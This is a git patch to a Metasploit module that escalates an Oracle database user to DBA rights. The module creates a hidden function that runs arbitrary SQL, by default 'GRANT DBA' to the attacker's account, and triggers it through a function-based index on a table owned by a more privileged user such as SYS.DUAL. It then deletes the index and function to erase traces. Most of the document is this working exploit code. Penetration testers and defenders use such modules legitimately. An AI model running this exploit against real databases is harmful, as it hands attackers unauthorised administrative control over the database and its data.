From d0f1f72426375b876c705d60764956949821a31a Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 10 Dec 2018 11:21:16 -0600 Subject: [PATCH] Clean up module --- .../admin/oracle/oracle_index_privesc.md | 7 --- .../admin/oracle/oracle_index_privesc.rb | 47 ++++++++++--------- 2 files changed, 24 insertions(+), 30 deletions(-) diff --git a/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md b/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md index ec0c092190..043cc246db 100644 --- a/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md +++ b/documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md @@ -26,10 +26,3 @@ **TABLE** Table to create the index on. - -## Scenarios - -### Escalating an Oracle SQL account to database administrator privileges. - - ``` - ``` diff --git a/modules/auxiliary/admin/oracle/oracle_index_privesc.rb b/modules/auxiliary/admin/oracle/oracle_index_privesc.rb index ba752fb1ff..ab1e7afadb 100644 --- a/modules/auxiliary/admin/oracle/oracle_index_privesc.rb +++ b/modules/auxiliary/admin/oracle/oracle_index_privesc.rb @@ -9,9 +9,11 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Oracle DB Privilege Escalation via function-based index', + 'Name' => 'Oracle DB Privilege Escalation via Function-Based Index', 'Description' => %q{ - This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique. + This module will escalate an Oracle DB user to DBA by creating a + function-based index on a table owned by a more-privileged user. + Credits to David Litchfield for publishing the technique. }, 'Author' => [ @@ -25,11 +27,11 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 21 2015')) - register_options( - [ - OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), - OptString.new('TABLE', [ true, 'Table to create the index on.', "SYS.DUAL"]), - ]) + register_options( + [ + OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}" ]), + OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]), + ]) end def run @@ -37,52 +39,51 @@ class MetasploitModule < Msf::Auxiliary func_name = Rex::Text.rand_text_alpha(6..10) - create_function = " + create_function = <<-EOF CREATE OR REPLACE FUNCTION #{func_name} (FOO varchar) return varchar deterministic authid current_user is pragma autonomous_transaction; begin - execute immediate '#{datastore['SQL']}'; + execute immediate '#{datastore['SQL'].gsub("'", "\\\\'")}'; commit; return ''; end; - " + EOF index_name = Rex::Text.rand_text_alpha(6..10) param_value = Rex::Text.rand_text_alpha(2..6) - create_index = " - CREATE INDEX #{index_name} ON - #{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))" + create_index = "CREATE INDEX #{index_name} ON " \ + "#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))" trigger = "SELECT * FROM #{datastore['TABLE']}" clean_index = "drop index #{index_name}" clean_func = "drop function #{func_name}" - print_status("Running exploit...") + print_status('Running exploit...') begin print_status("Attempting to create function #{func_name}...") - print_status(create_function) prepare_exec(create_function) print_status("Attempting to create index #{index_name}...") - print_status(create_index) prepare_exec(create_index) - print_status("Querying to trigger function...") - print_status(trigger) + print_status('Querying to trigger function...') prepare_exec(trigger) - print_status("Cleaning up index...") - print_status(clean_index) + print_status('Cleaning up index...') prepare_exec(clean_index) - print_status("Cleaning up function...") - print_status(clean_func) + print_status('Cleaning up function...') prepare_exec(clean_func) - print_status("Exploit complete!") + print_status('Exploit complete!') rescue ::OCIError => e print_error("Error! #{e.message}") end end + def prepare_exec(query) + print_status(query) + super + end + end